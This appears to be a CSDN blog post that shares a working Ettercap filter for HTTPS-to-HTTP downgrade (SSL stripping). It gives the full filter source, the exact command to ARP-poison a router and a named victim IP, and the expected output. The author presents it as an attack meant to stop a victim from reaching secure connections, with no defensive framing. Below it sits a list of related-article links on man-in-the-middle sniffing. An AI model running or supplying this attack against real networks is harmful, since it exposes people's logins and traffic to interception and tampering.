SSL Ettercap Filter

最新推荐文章于 2024-08-28 14:56:48 发布
最新推荐文章于 2024-08-28 14:56:48 发布
阅读量868 收藏 1
点赞数
分类专栏: [ettercap] [arp劫持] 文章标签: filter ssl encoding search loops string
Hi everyone

This is an Ettercap filter to stop victims from sending or receiving SSL packets, in simple words, it will downgrade users from HTTPS to HTTP.

*** to use this , i guess that you know how to add filters to Ettercap, if not, go to Ettercap website and learn how!

Filter:

############################################################################
# #
# HTTP Request/Response Filter -- hrf.ef -- filter source file #
# #
# by Jan Seidl (based on code from ALoR & NaGA) #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################

##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##

##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
   }
}

#####################
## Replace Content ##
#####################

##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
  # msg("[HTTP Response Filter] HTTP request seen.\n");
   if (search(DECODED.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   }
   if (search(DATA.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   }
}

##
# Response
if (ip.proto == TCP && tcp.src == 80) {
  # msg("[HTTP Response Filter] HTTP response seen.\n");
   if (search(DECODED.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   }
   if (search(DATA.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   }
}



*** Save the code as :   hrf.ef


*** Just run the attack with the filter (assuming router is 192.168.0.1 and victim is 192.168.0.100):

ettercap -T -q -F hrf.ef -M ARP:remote /192.168.0.1/ /192.168.0.100/

You should see the following output:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 
Content filters loaded from hrf.ef...
Listening on eth0... (Ethernet)
(...)
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] *** HTTPS ZAPPED from response
(...)

And your victim will no longer receive (nor send) any https string anymore.
Quick note about request / response filtering

Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it. The beauty of this attack is disallowing your victim to escape your domain to a secure zone.

Enjoy
U_L
jhonguy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中间人攻击 ettercap 嗅探密码
课嗨教育的专栏
01-08 603
简单介绍ettercap : 地球上最强大的ARP工具 在前面安装SET的时候。我们已经安装过了他。先围观他: /usr/sbin/ettercap 执行文件配置文件: root@kali:~# cd /usr/share/ettercap/ root@kali:/usr/share/ettercap# ls ettercap.png etter.filter etter.filter.kill etter.finger.mac etter.mime etter.dns
嗅探工具 --- wireshark、tcpdump、dsniff、ettercap、bettercap、netsniff-ng
墨鱼菜鸡
07-11 4915
最好的 MitM 中间人攻击开源框架清单:https://github.com/Chan9390/Awesome-MitM 哔哩哔哩:https://search.bilibili.com/all?keyword=wireshark 1、WireShark WireShark 是一个开源免费的高性能网络协议分析软件,它的前身就是非常著名的网络分析软...
ettercap-filters:一些 ettercap 过滤器
06-06
ettercap过滤器 一些过滤器( ) 要求 入门 git clone https://github.com/chxj1992/intranet-sniffer.git cd intranet-sniffer ./run.sh etterfilter replacer.filter ./run.sh -f filter.ef 192.168.1.5 ./run.sh -i eth0 -f filter.ef -g 192.168.0.1 192.168.1.2-100 更多选择 -i : the interface (wlan0/eth0/...) default: wlan0 -g : the gateway ip address default: 192.168.1.1 -f : filter default: NO FILTER 了解有关更多信息
easy ettercap filter
04-24 1415
I'm trying to do easy ettercap filter but it doesn't seem to work. The filter is: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-En
Fun with Ettercap Filters
04-25 1355
Read this then see the Flash video at: http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1         Ettercap[1] is sort of the Swiss army knife of ARP poisoning[2] and network sniffing. Ette
Ettercap : Filter规则大发送
04-24 6036
Ettercap : Filter规则大发送 SSL跳转到http替换HTTP数据包内容替换保存数据包内容POST提交数据其他端口数据包替换例子ARP修谈 SSH密码 Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。 Ette
使用Ettercap filter进行流量监听和数据篡改
最美的时光
06-26 1万+
简介Ettercap是一个综合性的中间人攻击工具,使用它可以进行ARP欺骗、拦截器、DNS欺骗等操作,本文将介绍使用ettercap的文本模式进行流量监听和代码注入的方式和注意点。
ettercap 实施中间人攻击
CSDN
12-21 7716
中间人攻击(Man-in-the-MiddleAttack 简称"MITM攻击")中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式,
Linux安装dsniff软件包,CentOS下安装dsniff,ettercap进行***检测
weixin_34637293的博客
05-07 1800
系统环境Linux:2.6.32-220.el6.x86_64(CentOS 6.2)安装工具:ettercap、dsniff说明:这里只是进行安装的说明,对于如果使用请问度娘和谷哥。废话不说了开始吧。一、安装Ettercap下载地址:wgethttp://down1.chinaunix.net/distfiles/ettercap-NG-0.7.3.tar.gz安装步骤(1).libnet-1....
Kali linux 学习笔记(六十三)密码破解——中间人攻击(mitmf、ettercap、PTH) 2020.4.7
闵行小鱼塘
04-07 1929
本节学习中间人攻击,主要是mitmf、ettercap、PTH
【安全牛学习笔记】中间人攻击、ARP MITM、中间人攻击、Pass the Hash
edu_aqniu的博客
10-11 3976
中间人攻击                                       Ettercap                                             - 统一的中间人攻击工具                           - 转发MAC与本机相同,但IP与本机不同的数据包     - 支持SSH1、SSL中间人攻击    
Ettercap系列IV:闭嘴吧天猫精灵----ettercap过滤器的应用 [Ettercap系列完结撒花]
lixiangminghate的专栏
03-02 3113
年前给儿子买了个天猫精灵,广告说这是智能音箱提供海量音乐!有很多音乐不假,但是为什么还附带一堆的儿歌?每次回家想听音乐,儿子就会强行播放儿歌。遥想起: When I was a boy,跟我妈抢遥控器,抢赢了,下图你们熟悉吗?抢输了,陪着看TVB妈妈剧。 When I was a young man,跟老婆抢笔记本,抢赢了会吵架;抢输了要陪着看掉智商的韩剧。 And now,跟儿...
ettercap 入门学习
luela_hunter的博客
06-02 8961
ettercap入门入门了解ettercap嗅探、中间人攻击的功能 测试环境: ettercap 0.8.2 三台硬件主机位于同局域网,其上的ubuntu虚拟机与主机间的网络采用桥接模式 网关地址为10.0.0.1 主机 功能 IP 主机A 用作服务器端 10.0.10.159 主机B 用作客户端 10.0.10.127 中间人主机C 安装了etterc
ettercap的使用帮助文档 官方man page的个人理解
热门推荐
王三三
04-23 1万+
原英文的帮助文档可以在 http://linux.die.net/man/8/ettercap 查看 或者在安装有ettercap的Linux终端输入”man ettercap”查看多数以我自己的理解的方式翻译,不是很理解的地方翻译过来的可能会有很多不对的地方 如果对我翻译的内容有不一样的看法,欢迎交流。Nameettercap 0.7.5 - A multipurpose sniffer/co
vue项目关于ERR_OSSL_EVP_UNSUPPORTED的问题
irisMoon06的博客
08-25 193
该问题通常与 OpenSSL 库版本不兼容或配置问题有关,特别是在使用。
解决之道:处理Nginx负载均衡中的SSL握手失败问题
最新发布
2401_85763803的博客
08-28 486
通过本文的分析和讨论,你应该能够了解SSL握手失败的原因,并掌握在Nginx负载均衡中处理这些问题的方法。随着网络安全形势的不断变化,持续监控和更新SSL/TLS配置是确保Web应用安全的关键。Nginx 是一种广泛使用的高性能 HTTP 服务器和反向代理,支持SSL/TLS协议,可以为Web应用提供安全的连接。然而,在配置SSL/TLS时,可能会遇到SSL握手失败的问题,这会导致客户端无法建立安全的连接。在Nginx配置中指定支持的SSL/TLS版本和密码套件,以匹配客户端的能力。
Linux—— 配置ssl安全证书
Xinan_____的博客
08-28 958
1.配置自签证书,加固安全访问 生成CA根秘钥 生成CA证书 生成服务器秘钥文件 生成服务器证书签名申请文件 生成服务器证书 查看服务器证书文件 三、实验过程整理 修改配置文件 nginx关于ssl 安全加固相关配置说明:Configuring HTTPS servershttps://nginx.org/en/docs/http/configuring_https_servers.html 3.ssl_prot
ettercap ftp
03-28
ettercap是一款开源的网络嗅探和中间人攻击工具,它可以用于分析和拦截网络流量。而FTP(File Transfer Protocol)是一种用于在计算机之间传输文件的协议。 在ettercap中,可以使用插件来支持FTP协议的中间人攻击。通过中间人攻击,ettercap可以拦截FTP流量并对其进行分析或修改。 具体来说,ettercap可以通过以下步骤来进行FTP中间人攻击: 1. 启动ettercap并选择适当的接口和目标。 2. 使用插件来启用FTP中间人攻击功能。 3. ettercap将拦截目标主机与FTP服务器之间的通信,并将其重定向到自己。 4. 在中间人攻击过程中,ettercap可以捕获FTP的用户名、密码等敏感信息。 5. ettercap还可以修改FTP流量,例如篡改文件内容或注入恶意代码。 然而,需要注意的是,使用ettercap进行中间人攻击是非法的,除非你有合法的授权和目的。在实际应用中,请确保遵守法律法规,并仅在合法授权的情况下使用相关工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值